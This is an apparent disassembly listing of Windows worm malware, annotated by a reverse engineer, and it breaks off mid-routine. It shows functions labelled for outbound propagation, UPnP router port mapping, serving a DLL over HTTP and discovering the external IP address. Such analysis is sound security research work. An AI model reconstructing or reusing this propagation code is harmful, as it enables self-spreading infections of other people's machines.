ms_exc = CPPEH_RECORD ptr -18h
push 14h
push offset stru_9A2FA0
call __SEH_prolog
push 6 ; dwCoInit
xor esi, esi
push esi ; pvReserved
call ds:CoInitializeEx
mov [ebp+var_20], eax
cmp eax, 80010106h
jz short loc_9A9C32
cmp eax, esi
jl short loc_9A9C8C
loc_9A9C32: ; CODE XREF: sub_9A9C0D+1F�j
push esi ; pReserved3
push esi ; dwCapabilities
push esi ; pAuthList
push 3 ; dwImpLevel
push 4 ; dwAuthnLevel
push esi ; pReserved1
push esi ; asAuthSvc
push 0FFFFFFFFh ; cAuthSvc
push esi ; pSecDesc
call ds:CoInitializeSecurity
mov [ebp+ms_exc.disabled], esi
mov [ebp+ppv], esi
lea eax, [ebp+ppv]
push eax ; ppv
push offset riid ; riid
push 17h ; dwClsContext
push esi ; pUnkOuter
push offset rclsid ; rclsid
call ds:CoCreateInstance
mov [ebp+var_24], eax
mov ebx, [ebp+ppv]
cmp ebx, esi
jz short loc_9A9C79
call sub_9A9A64
mov eax, [ebp+ppv]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9C79: ; CODE XREF: sub_9A9C0D+5C�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9A9C8C
; ---------------------------------------------------------------------------
loc_9A9C7F: ; DATA XREF: .text:stru_9A2FA0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A9C83: ; DATA XREF: .text:stru_9A2FA0�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor esi, esi
loc_9A9C8C: ; CODE XREF: sub_9A9C0D+23�j
; sub_9A9C0D+70�j
cmp [ebp+var_20], esi
jl short loc_9A9C97
call ds:CoUninitialize
loc_9A9C97: ; CODE XREF: sub_9A9C0D+82�j
xor eax, eax
call __SEH_epilog
retn 4
sub_9A9C0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_9A9CA1 proc near ; CODE XREF: sub_9AFC25+6B�p
VersionInformation= _OSVERSIONINFOA ptr -0A0h
var_C = word ptr -0Ch
ThreadId = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 0A0h
push edi
push 26h
pop ecx
xor eax, eax
mov [ebp+78h+VersionInformation.dwOSVersionInfoSize], 9Ch
lea edi, [ebp+78h+VersionInformation.dwMajorVersion]
rep stosd
lea eax, [ebp+78h+VersionInformation]
push eax ; lpVersionInformation
call ds:GetVersionExA
cmp [ebp+78h+VersionInformation.dwMajorVersion], 5
jnz short loc_9A9D23
cmp [ebp+78h+VersionInformation.dwMinorVersion], 1
jnz short loc_9A9CDB
cmp [ebp+78h+var_C], 2
jb short loc_9A9CE8
loc_9A9CDB: ; CODE XREF: sub_9A9CA1+31�j
cmp [ebp+78h+VersionInformation.dwMinorVersion], 2
jnz short loc_9A9D23
cmp [ebp+78h+var_C], 1
jnb short loc_9A9D23
loc_9A9CE8: ; CODE XREF: sub_9A9CA1+38�j
push esi
lea eax, [ebp+78h+ThreadId]
push eax ; lpThreadId
xor esi, esi
push esi ; dwCreationFlags
push esi ; lpParameter
push offset sub_9A9C0D ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call ds:CreateThread
mov edi, eax
push 3A98h ; dwMilliseconds
push edi ; hHandle
call ds:WaitForSingleObject
cmp eax, 102h
jnz short loc_9A9D1B
push esi ; dwExitCode
push edi ; hThread
call ds:TerminateThread
loc_9A9D1B: ; CODE XREF: sub_9A9CA1+70�j
push edi ; hObject
call ds:CloseHandle
pop esi
loc_9A9D23: ; CODE XREF: sub_9A9CA1+2B�j
; sub_9A9CA1+3E�j ...
pop edi
add ebp, 78h
leave
retn
sub_9A9CA1 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A9D29(char *lpFirst)
sub_9A9D29 proc near ; CODE XREF: sub_9AAE1D+1C�p
; sub_9AAE90+64�p ...
lpFirst = dword ptr 4
push ebx
mov ebx, [esp+4+lpFirst]
push ebp
push edi
push 2Eh ; Ch
push ebx ; Str
xor ebp, ebp
call ds:strrchr
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_9A9DA0
push esi
xor esi, esi
loc_9A9D46: ; CODE XREF: sub_9A9D29+37�j
push off_9BA3F8[esi] ; lpSrch
push ebx ; lpFirst
call ds:StrStrIA
test eax, eax
jnz short loc_9A9D9C
add esi, 4
cmp esi, 0D0h
jb short loc_9A9D46
jmp short loc_9A9D6E
; ---------------------------------------------------------------------------
loc_9A9D64: ; CODE XREF: sub_9A9D29+47�j
lea eax, [edi-1]
cmp byte ptr [eax], 2Eh
jz short loc_9A9D72
mov edi, eax
loc_9A9D6E: ; CODE XREF: sub_9A9D29+39�j
cmp edi, ebx
ja short loc_9A9D64
loc_9A9D72: ; CODE XREF: sub_9A9D29+41�j
xor ebx, ebx
loc_9A9D74: ; CODE XREF: sub_9A9D29+6F�j
lea esi, off_9BA4C8[ebx]
push dword ptr [esi] ; Str
call strlen
push eax ; MaxCount
push dword ptr [esi] ; Str
push edi ; Str1
call ds:_strnicmp
add esp, 10h
test eax, eax
jz short loc_9A9D9C
add ebx, 4
cmp ebx, 20h
jb short loc_9A9D74
jmp short loc_9A9D9F
; ---------------------------------------------------------------------------
loc_9A9D9C: ; CODE XREF: sub_9A9D29+2C�j
; sub_9A9D29+67�j
xor ebp, ebp
inc ebp
loc_9A9D9F: ; CODE XREF: sub_9A9D29+71�j
pop esi
loc_9A9DA0: ; CODE XREF: sub_9A9D29+18�j
pop edi
mov eax, ebp
pop ebp
pop ebx
retn
sub_9A9D29 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A9DA6(u_long hostlong)
sub_9A9DA6 proc near ; CODE XREF: sub_9AABAE+42�p
; sub_process_http_request_and_serve_dll_file+1B4�p
hostlong = dword ptr 4
push esi
push [esp+4+hostlong]
xor esi, esi
call sub_check_value_of_hostlong
test eax, eax
pop ecx
jz short loc_9A9DE3
push [esp+4+hostlong] ; hostlong
call ds:__imp_htonl
xor ecx, ecx
loc_9A9DC3: ; CODE XREF: sub_9A9DA6+36�j
cmp eax, dword_9A2FB0[ecx]
jb short loc_9A9DD3
cmp eax, dword_9A2FB4[ecx]
jbe short loc_9A9DE0
loc_9A9DD3: ; CODE XREF: sub_9A9DA6+23�j
add ecx, 8
cmp ecx, 0C60h
jb short loc_9A9DC3
jmp short loc_9A9DE3
; ---------------------------------------------------------------------------
loc_9A9DE0: ; CODE XREF: sub_9A9DA6+2B�j
xor esi, esi
inc esi
loc_9A9DE3: ; CODE XREF: sub_9A9DA6+F�j
; sub_9A9DA6+38�j
mov eax, esi
pop esi
retn
sub_9A9DA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9DE7 proc near ; CODE XREF: sub_9A9FDF+28�p
ppv = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+ppv], 0
and [ebp+var_4], 0
and dword ptr [edi], 0
push esi
lea eax, [ebp+ppv]
push eax ; ppv
push offset stru_9A3E74 ; riid
push 1 ; dwClsContext
push 0 ; pUnkOuter
push offset stru_9A3E64 ; rclsid
call ds:CoCreateInstance
mov esi, eax
test esi, esi
jl short loc_9A9E35
mov eax, [ebp+ppv]
mov ecx, [eax]
lea edx, [ebp+var_4]
push edx
push eax
call dword ptr [ecx+1Ch]
mov esi, eax
test esi, esi
jl short loc_9A9E35
mov eax, [ebp+var_4]
mov ecx, [eax]
push edi
push eax
call dword ptr [ecx+1Ch]
mov esi, eax
loc_9A9E35: ; CODE XREF: sub_9A9DE7+2D�j
; sub_9A9DE7+40�j
mov eax, [ebp+var_4]
test eax, eax
jz short loc_9A9E42
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9E42: ; CODE XREF: sub_9A9DE7+53�j
mov eax, [ebp+ppv]
test eax, eax
jz short loc_9A9E4F
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9E4F: ; CODE XREF: sub_9A9DE7+60�j
mov eax, esi
pop esi
leave
retn
sub_9A9DE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9E54 proc near ; CODE XREF: sub_9A9ED0+3C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
and dword ptr [esi], 0
mov ecx, [eax]
and [ebp+var_8], 0
and [ebp+var_C], 0
push ebx
lea edx, [ebp+var_C]
push edx
push eax
call dword ptr [ecx+48h]
mov ebx, eax
test ebx, ebx
jl short loc_9A9EB1
mov eax, [ebp+var_C]
mov ecx, [eax]
lea edx, [ebp+var_8]
push edx
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword ptr [ecx+28h]
test eax, eax
jl short loc_9A9EAF
mov eax, [ebp+var_8]
mov ecx, [eax]
lea edx, [ebp+var_4]
push edx
push eax
call dword ptr [ecx+4Ch]
mov ebx, eax
test ebx, ebx
jl short loc_9A9EB1
cmp [ebp+var_4], 0
jz short loc_9A9EB1
mov dword ptr [esi], 1
jmp short loc_9A9EB1
; ---------------------------------------------------------------------------
loc_9A9EAF: ; CODE XREF: sub_9A9E54+37�j
xor ebx, ebx
loc_9A9EB1: ; CODE XREF: sub_9A9E54+20�j
; sub_9A9E54+4A�j ...
mov eax, [ebp+var_8]
test eax, eax
jz short loc_9A9EBE
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9EBE: ; CODE XREF: sub_9A9E54+62�j
mov eax, [ebp+var_C]
test eax, eax
jz short loc_9A9ECB
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9ECB: ; CODE XREF: sub_9A9E54+6F�j
mov eax, ebx
pop ebx
leave
retn
sub_9A9E54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A9ED0(int,int,OLECHAR *psz)
sub_9A9ED0 proc near ; CODE XREF: sub_9A9FDF+59�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
ppv = dword ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
psz = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
lea ecx, [ebp+var_4]
mov edi, eax
mov eax, [edi]
xor ebx, ebx
push ecx
push edi
mov [ebp+var_14], ebx
mov [ebp+ppv], ebx
mov [ebp+var_C], ebx
call dword ptr [eax+28h]
test eax, eax
jl short loc_9A9F01
cmp [ebp+var_4], bx
jz short loc_9A9F01
mov eax, [edi]
push ebx
push edi
call dword ptr [eax+2Ch]
loc_9A9F01: ; CODE XREF: sub_9A9ED0+22�j
; sub_9A9ED0+28�j
push [ebp+arg_4]
lea esi, [ebp+var_10]
push [ebp+arg_0]
mov eax, edi
call sub_9A9E54
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jl loc_9A9FB4
cmp [ebp+var_10], ebx
jnz loc_9A9FB4
mov eax, [edi]
lea ecx, [ebp+var_C]
push ecx
push edi
call dword ptr [eax+48h]
mov esi, eax
cmp esi, ebx
jl short loc_9A9FB4
lea eax, [ebp+ppv]
push eax ; ppv
push offset stru_9A3E94 ; riid
push 1 ; dwClsContext
push ebx ; pUnkOuter
push offset stru_9A3E84 ; rclsid
call ds:CoCreateInstance
mov esi, eax
cmp esi, ebx
jl short loc_9A9FB4
mov eax, [ebp+ppv]
push [ebp+arg_0]
mov ecx, [eax]
push eax
call dword ptr [ecx+38h]
mov esi, eax
cmp esi, ebx
jl short loc_9A9FB4
mov eax, [ebp+ppv]
push [ebp+arg_4]
mov ecx, [eax]
push eax
call dword ptr [ecx+30h]
mov esi, eax
cmp esi, ebx
jl short loc_9A9FB4
push [ebp+psz] ; psz
call ds:SysAllocString
mov edi, eax
push edi ; BSTR
call ds:SysStringLen
test eax, eax
jnz short loc_9A9F94
mov esi, 8007000Eh
jmp short loc_9A9FB7
; ---------------------------------------------------------------------------
loc_9A9F94: ; CODE XREF: sub_9A9ED0+BB�j
mov eax, [ebp+ppv]
mov ecx, [eax]
push edi
push eax
call dword ptr [ecx+20h]
mov esi, eax
cmp esi, ebx
jl short loc_9A9FB7
mov eax, [ebp+var_C]
push [ebp+ppv]
mov ecx, [eax]
push eax
call dword ptr [ecx+20h]
mov esi, eax
jmp short loc_9A9FB7
; ---------------------------------------------------------------------------
loc_9A9FB4: ; CODE XREF: sub_9A9ED0+47�j
; sub_9A9ED0+50�j ...
mov edi, [ebp+var_14]
loc_9A9FB7: ; CODE XREF: sub_9A9ED0+C2�j
; sub_9A9ED0+D2�j ...
push edi ; bstrString
call ds:SysFreeString
mov eax, [ebp+ppv]
cmp eax, ebx
jz short loc_9A9FCB
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9FCB: ; CODE XREF: sub_9A9ED0+F3�j
mov eax, [ebp+var_C]
cmp eax, ebx
jz short loc_9A9FD8
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9FD8: ; CODE XREF: sub_9A9ED0+100�j
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_9A9ED0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9FDF proc near ; CODE XREF: sub_9AFC25+59�p
psz = word ptr -18h
var_4 = dword ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
xor ebx, ebx
push 6 ; dwCoInit
push ebx ; pvReserved
mov [ebp+var_4], ebx
call ds:CoInitializeEx
mov esi, eax
cmp esi, 80010106h
jz short loc_9AA003
cmp esi, ebx
jl short loc_9AA047
loc_9AA003: ; CODE XREF: sub_9A9FDF+1E�j
push edi
lea edi, [ebp+var_4]
call sub_9A9DE7
test eax, eax
pop edi
jl short loc_9AA047
call ds:rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+psz]
add edx, 5
push edx
push eax
call sub_9AC672
lea eax, [ebp+psz]
push eax ; psz
movzx eax, [ebp+arg_0]
push 6 ; int
push eax ; int
mov eax, [ebp+var_4]
call sub_9A9ED0
add esp, 14h
test eax, eax
jl short loc_9AA047
xor ebx, ebx
inc ebx
loc_9AA047: ; CODE XREF: sub_9A9FDF+22�j
; sub_9A9FDF+30�j ...
mov eax, [ebp+var_4]
test eax, eax
jz short loc_9AA054
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9AA054: ; CODE XREF: sub_9A9FDF+6D�j
test esi, esi
jl short loc_9AA05E
call ds:CoUninitialize
loc_9AA05E: ; CODE XREF: sub_9A9FDF+77�j
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_9A9FDF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AA064 proc near ; CODE XREF: sub_9AA320+69�p
Str = byte ptr -104h
var_103 = byte ptr -103h
nSize = dword ptr -4
Dest = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push esi
push edi
push 3Fh
pop ecx
xor eax, eax
mov [ebp+Str], 0
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
mov esi, 100h
push esi ; namelen
lea eax, [ebp+Str]
push eax ; name
call ds:gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_9AA0B2
lea eax, [ebp+nSize]
push eax ; nSize
lea eax, [ebp+Str]
push eax ; lpBuffer
mov [ebp+nSize], esi
call ds:GetComputerNameA
loc_9AA0B2: ; CODE XREF: sub_9AA064+38�j
call sub_get_seed_from_volume_info
push eax
lea eax, [ebp+Str]
push eax ; Str
call strlen
push eax
lea eax, [ebp+Str]
push eax
call sub_9A9237
mov esi, [ebp+Dest]
add esp, 0Ch
push eax
push offset a08x08x ; "%08x%08x"
push ebx ; Count
push esi ; Dest
call ds:_snprintf
add esp, 14h
pop edi
mov byte ptr [esi+ebx-1], 0
pop esi
leave
retn
sub_9AA064 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA0F1(int,void *Count,int hostshort,struct in_addr in)
sub_9AA0F1 proc near ; CODE XREF: sub_post_and_recv_find_external_adr+45�p
; sub_9AA320+52�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Memory = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
Count = dword ptr 0Ch
hostshort = dword ptr 10h
in = in_addr ptr 14h
push 20h
push offset stru_9A3EB0
call __SEH_prolog
mov eax, dword ptr [ebp+in.S_un]
xor esi, esi
mov [ebp+var_1C], esi
mov [ebp+ms_exc.disabled], esi
mov [ebp+var_28], eax
cmp eax, esi
jz short loc_9AA120
push eax ; in
call ds:inet_ntoa
push eax ; unsigned __int8 *
call ds:_mbsdup
pop ecx
jmp short loc_9AA122
; ---------------------------------------------------------------------------
loc_9AA120: ; CODE XREF: sub_9AA0F1+1C�j
xor eax, eax
loc_9AA122: ; CODE XREF: sub_9AA0F1+2D�j
mov [ebp+Memory], eax
push esi ; int
push esi ; int
push eax ; cp
push 7D0h ; int
call sub_upnp_broadcast_and_recv
add esp, 10h
mov [ebp+var_2C], eax
cmp eax, esi
jz short loc_9AA16B
mov ecx, eax
loc_9AA13E: ; CODE XREF: sub_9AA0F1+56�j
mov [ebp+var_20], ecx
cmp ecx, esi
jz short loc_9AA149
mov ecx, [ecx]
jmp short loc_9AA13E
; ---------------------------------------------------------------------------
loc_9AA149: ; CODE XREF: sub_9AA0F1+52�j
push 10h ; int
push [ebp+hostshort] ; hostshort
push [ebp+Count] ; Count
push [ebp+arg_0] ; int
push eax ; int
call sub_9B5DA4
add esp, 14h
mov [ebp+var_30], eax
cmp eax, esi
jz short loc_9AA16B
mov [ebp+var_1C], 1
loc_9AA16B: ; CODE XREF: sub_9AA0F1+49�j
; sub_9AA0F1+71�j
push [ebp+Memory] ; Memory
call ds:free
pop ecx
jmp short loc_9AA17E
; ---------------------------------------------------------------------------
loc_9AA177: ; DATA XREF: .text:stru_9A3EB0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA17B: ; DATA XREF: .text:stru_9A3EB0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA17E: ; CODE XREF: sub_9AA0F1+84�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9AA0F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA18B(int,char *Str2)
sub_9AA18B proc near ; CODE XREF: sub_9AA320+7C�p
Dest = byte ptr -0F8h
Str1 = byte ptr -0B8h
var_68 = dword ptr -68h
var_58 = dword ptr -58h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_3C = dword ptr -3Ch
Memory = byte ptr -34h
var_2F = byte ptr -2Fh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
Str2 = dword ptr 0Ch
push 0E8h
push offset stru_9A3EC8
call __SEH_prolog
mov edi, ecx
xor ebx, ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+var_1C], ebx
loc_9AA1A4: ; CODE XREF: sub_9AA18B+D7�j
push [ebp+var_1C]
push offset aD ; "%d"
push 6 ; Count
lea eax, [ebp+Memory]
push eax ; Dest
call ds:_snprintf
mov [ebp+var_2F], bl
mov [ebp+Dest], bl
mov byte ptr [ebp+var_44], bl
mov byte ptr [ebp+var_58], bl
mov [ebp+Str1], bl
mov byte ptr [ebp+var_28], bl
mov byte ptr [ebp+var_3C], bl
mov byte ptr [ebp+var_68], bl
mov esi, [ebp+arg_0]
add esi, 484h
lea eax, [ebp+var_58]
push eax ; int
lea eax, [ebp+Dest]
push eax ; Dest
lea eax, [ebp+var_44]
push eax ; int
lea eax, [ebp+Str1]
push eax ; int
lea eax, [ebp+var_20]
push eax ; int
lea eax, [ebp+var_3C]
push eax ; int
lea eax, [ebp+var_68]
push eax ; int
lea eax, [ebp+var_28]
push eax ; int
lea eax, [ebp+Memory]
push eax ; Memory
push esi ; int
push dword ptr [edi] ; Str
call sub_9B686F
add esp, 3Ch
mov [ebp+var_2C], eax
cmp eax, ebx
jnz short loc_9AA25C
push [ebp+Str2] ; Str2
lea eax, [ebp+Str1]
push eax ; Str1
call ds:_strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_9AA25C
push offset aTcp ; "TCP"
lea eax, [ebp+var_20]
push eax ; Str1
call ds:_strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_9AA25C
lea eax, [ebp+var_20]
push eax ; int
lea eax, [ebp+var_28]
push eax ; int
push esi ; int
push dword ptr [edi] ; Str
call sub_9B679A
add esp, 10h
mov [ebp+var_48], eax
loc_9AA25C: ; CODE XREF: sub_9AA18B+8E�j
; sub_9AA18B+A4�j ...
inc [ebp+var_1C]
cmp [ebp+var_2C], ebx
jz loc_9AA1A4
jmp short loc_9AA271
; ---------------------------------------------------------------------------
loc_9AA26A: ; DATA XREF: .text:stru_9A3EC8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA26E: ; DATA XREF: .text:stru_9A3EC8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA271: ; CODE XREF: sub_9AA18B+DD�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_9AA18B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_post_and_recv_find_external_adr(int,int,struct in_addr in)
sub_post_and_recv_find_external_adr proc near ; CODE XREF: sub_outbound_propagation+115�p
Count = byte ptr -74Ch
var_2C8 = dword ptr -2C8h
Str = dword ptr -48h
hostshort = byte ptr -3Ch
var_3B = byte ptr -3Bh
Dest = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
in = in_addr ptr 10h
push 73Ch
push offset stru_9A3ED8
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_1C], ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+hostshort], bl
xor eax, eax
lea edi, [ebp+var_3B]
stosd
stosd
stosd
stosw
stosb
mov [ebp+Dest], bl
xor eax, eax
lea edi, [ebp+var_2B]
stosd
stosd
stosd
stosw
stosb
push dword ptr [ebp+in.S_un] ; in
lea eax, [ebp+hostshort]
push eax ; hostshort
lea eax, [ebp+Count]
push eax ; Count
lea eax, [ebp+Str]
push eax ; int
call sub_9AA0F1
add esp, 10h
test eax, eax
jz short loc_9AA313
lea eax, [ebp+Dest]
push eax ; Dest
lea eax, [ebp+var_2C8]
push eax ; int
push [ebp+Str] ; Str
call sub_post_and_recv_find_string_ret_0_if_succ
add esp, 0Ch
cmp [ebp+Dest], bl
jz short loc_9AA313
lea eax, [ebp+hostshort]
push eax ; cp
mov esi, ds:__imp_inet_addr
call esi ; __imp_inet_addr
mov ecx, [ebp+arg_0]
mov [ecx], eax
lea eax, [ebp+Dest]
push eax ; cp
call esi ; __imp_inet_addr
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov [ebp+var_1C], 1
jmp short loc_9AA313
; ---------------------------------------------------------------------------
loc_9AA30C: ; DATA XREF: .text:stru_9A3ED8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA310: ; DATA XREF: .text:stru_9A3ED8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA313: ; CODE XREF: sub_post_and_recv_find_external_adr+4F�j
; sub_post_and_recv_find_external_adr+6A�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_post_and_recv_find_external_adr endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA320(__int16,int,struct in_addr in)
sub_9AA320 proc near ; CODE XREF: sub_outbound_propagation+186�p
Count = dword ptr -78Ch
var_308 = dword ptr -308h
var_88 = byte ptr -88h
Str2 = dword ptr -78h
var_58 = dword ptr -58h
hostshort = dword ptr -50h
Str = dword ptr -40h
var_34 = dword ptr -34h
Dest = byte ptr -30h
var_2B = byte ptr -2Bh
var_28 = dword ptr -28h
var_23 = byte ptr -23h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = word ptr 8
arg_4 = dword ptr 0Ch
in = in_addr ptr 10h
push 77Ch
push offset stru_9A3EE8
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_20], ebx
mov [ebp+ms_exc.disabled], ebx
mov byte ptr [ebp+hostshort], bl
xor eax, eax
lea edi, [ebp+hostshort+1]
stosd
stosd
stosd
stosw
stosb
movzx eax, [ebp+arg_0]
push eax
push offset aU ; "%u"
push 6 ; Count
lea eax, [ebp+Dest]
push eax ; Dest
mov edi, ds:_snprintf
call edi ; _snprintf
mov [ebp+var_2B], bl
push dword ptr [ebp+in.S_un] ; in
lea eax, [ebp+hostshort]
push eax ; hostshort
lea eax, [ebp+Count]
push eax ; Count
lea eax, [ebp+Str]
push eax ; int
call sub_9AA0F1
add esp, 20h
test eax, eax
jz loc_9AA456
lea eax, [ebp+Str2]
push eax
push 20h
pop ebx
call sub_9AA064
lea eax, [ebp+Str2]
push eax ; Str2
lea eax, [ebp+Count]
push eax ; int
lea ecx, [ebp+Str]
call sub_9AA18B
add esp, 0Ch
mov esi, [ebp+arg_4]
mov word ptr [esi], 50h
and [ebp+var_1C], 0
mov ebx, offset aTcp ; "TCP"
loc_9AA3B5: ; CODE XREF: sub_9AA320+121�j
cmp [ebp+var_1C], 3
jge loc_9AA456
movzx eax, word ptr [esi]
push eax
push offset aU ; "%u"
push 6 ; Count
lea eax, [ebp+var_28]
push eax ; Dest
call edi ; _snprintf
mov [ebp+var_23], 0
push ebx ; int
lea eax, [ebp+Str2]
push eax ; int
lea eax, [ebp+hostshort]
push eax ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+var_28]
push eax ; int
lea eax, [ebp+var_308]
push eax ; int
push [ebp+Str] ; Str
call sub_9B6663
add esp, 2Ch
mov [ebp+var_34], eax
test eax, eax
jnz short loc_9AA427
lea eax, [ebp+var_58]
push eax ; int
lea eax, [ebp+var_88]
push eax ; Dest
push ebx ; int
lea eax, [ebp+var_28]
push eax ; int
lea eax, [ebp+var_308]
push eax ; int
push [ebp+Str] ; Str
call sub_9B6A70
add esp, 18h
mov [ebp+var_34], eax
test eax, eax
jz short loc_9AA446
loc_9AA427: ; CODE XREF: sub_9AA320+DC�j
call ds:rand
cdq
mov ecx, 2310h
idiv ecx
add edx, 400h
mov [esi], dx
inc [ebp+var_1C]
jmp loc_9AA3B5
; ---------------------------------------------------------------------------
loc_9AA446: ; CODE XREF: sub_9AA320+105�j
mov [ebp+var_20], 1
jmp short loc_9AA456
; ---------------------------------------------------------------------------
loc_9AA44F: ; DATA XREF: .text:stru_9A3EE8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA453: ; DATA XREF: .text:stru_9A3EE8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA456: ; CODE XREF: sub_9AA320+5C�j
; sub_9AA320+99�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_20]
call __SEH_epilog
retn
sub_9AA320 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AA463 proc near ; CODE XREF: sub_download_and_check_my_IP+79�p
cp = byte ptr -38h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 28h
push offset stru_9A3F70
call __SEH_prolog
mov edi, ecx
mov esi, edx
or [ebp+var_20], 0FFFFFFFFh
xor ebx, ebx
mov [ebp+ms_exc.disabled], ebx
cmp edi, 10h
jnb short loc_9AA4A8
push 0Fh ; Count
push esi ; Source
lea eax, [ebp+cp]
push eax ; Dest
call ds:strncpy
add esp, 0Ch
mov [ebp+var_29], bl
lea eax, [ebp+cp]
push eax ; cp
call inet_addr
mov [ebp+var_20], eax
cmp eax, ebx
jnz short loc_9AA4A8
or [ebp+var_20], 0FFFFFFFFh
loc_9AA4A8: ; CODE XREF: sub_9AA463+1C�j
; sub_9AA463+3F�j
cmp [ebp+var_20], 0FFFFFFFFh
jnz loc_9AA565
mov [ebp+var_1C], ebx
loc_9AA4B5: ; CODE XREF: sub_9AA463+66�j
cmp [ebp+var_1C], edi
jnb short loc_9AA4CB
mov eax, [ebp+var_1C]
add eax, esi
cmp [eax], bl
jnz short loc_9AA4C6
mov byte ptr [eax], 20h
loc_9AA4C6: ; CODE XREF: sub_9AA463+5E�j
inc [ebp+var_1C]
jmp short loc_9AA4B5
; ---------------------------------------------------------------------------
loc_9AA4CB: ; CODE XREF: sub_9AA463+55�j
mov [esi+edi-1], bl
push esi ; Str
call ds:_strlwr
pop ecx
loc_9AA4D7: ; CODE XREF: sub_9AA463+A5�j
; sub_9AA463+AA�j ...
cmp [ebp+var_20], 0FFFFFFFFh
jnz loc_9AA565
push offset SubStr ; "ip address"
push esi ; Str
call ds:strstr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_24], esi
cmp esi, ebx
jz short loc_9AA565
add esi, 0Ah
mov [ebp+var_24], esi
xor ecx, ecx
loc_9AA500: ; CODE XREF: sub_9AA463+F9�j
mov [ebp+var_1C], ecx
